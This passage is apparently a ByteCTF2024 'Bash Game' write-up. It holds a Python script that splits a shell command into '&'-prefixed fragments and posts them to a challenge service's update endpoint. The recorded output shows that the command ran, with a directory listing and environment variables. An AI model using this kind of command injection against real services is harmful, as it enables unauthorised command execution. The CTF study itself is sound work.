利用 `&` 可以将匹配到的内容再写入进去(`&` 在替换内容中代表本次匹配到的文本)。

ByteCTF2024 Misc Bash Game

import requests

# Base URL of the challenge service. "xxxx" is the author's redacted
# placeholder; the commented line is the local test instance. The request
# loop appends "update" directly, so the value has to end with "/".
url = "xxxx"
#url = "http://127.0.0.1:23333/"

# Command whose characters are split into one fragment per request.
cmd = "ls -al /opt/challenge/"

# Every fragment has the shape "&" + <text> + "$". Per the note at the top of
# the page, "&" stands for the text that was matched, so each fragment keeps
# what is already there and adds <text> after it.
# NOTE(review): the server-side code is not on this page, so how the `name`
# field is consumed is an assumption. Whatever consumes it should treat "&",
# backslash and backtick as plain data, never as replacement or shell syntax.
_wrapper = "&\\\\`$"                       # opening and closing fragment
_escaped = {" ": "&\\t$", "/": "&\\/$"}    # space and "/" use a backslash form

datas = ["a", _wrapper]
# Default case is "&" + the literal character + "$" (the line the author
# marked with "# this").
datas.extend(_escaped.get(ch, "&" + ch + "$") for ch in cmd)
datas += [_wrapper, "aaaaaaaaaaaaaaaaaaa"]

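# Send the fragments one request at a time, in list order. Each one goes out
# as the form field `name` to the `update` endpoint. The path is appended by
# plain string concatenation, so `url` must already end with "/".
endpoint = f"{url}update"
for data in datas:
    # requests waits indefinitely by default; a timeout stops a stalled
    # connection from hanging the whole run.
    resp = requests.post(endpoint, data={'name': data}, timeout=10)
    # Print the raw response body (bytes) for every request.
    print(resp.content)

# Responses recorded by the author, kept verbatim. The last line matches the
# `ls -al /opt/challenge/` command set in `cmd`; the earlier ones look like
# output from other commands that are not shown on this page.
# NOTE(review): the listing shows ctf.sh and ops.sh with mode rwxrwxrwx next
# to root-owned files. Scripts in a service directory should be root-owned and
# not writable by the service account, independent of the input-handling issue.
    # /
    # app bin boot dev docker-entrypoint.d docker-entrypoint.sh etc home lib lib64 media mnt opt proc root run sbin srv start.sh sys tmp usr var
    # SHELL=/bin/sh HOSTNAME=a9ceb9a37178 PWD=/ LOGNAME=ctf _=/usr/bin/env PKG_RELEASE=1~bookworm HOME=/home/ctf DYNPKG_RELEASE=2~bookworm NJS_VERSION=0.8.5 USER=ctf SHLVL=0 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin NGINX_VERSION=1.27.1 MAIL=/var/mail/ctf NJS_RELEASE=1~bookworm
    # total 16\\ndrwxr-xr-x 1 ctf  ctf   44 Sep 21 06:02 .\\ndrwxr-xr-x 1 root root  31 Sep 10 07:55 ..\\n-rwxrwxrwx 1 ctf  ctf  327 Sep 21 06:02 ctf.sh\\n-rwx------ 1 root root  42 Sep 21 05:54 flag\\n-rwxrwxrwx 1 ctf  ctf  196 Sep  4 11:13 ops.sh\\n-rwxr-xr-x 1 root root  81 Sep  6 04:09 truegame.sh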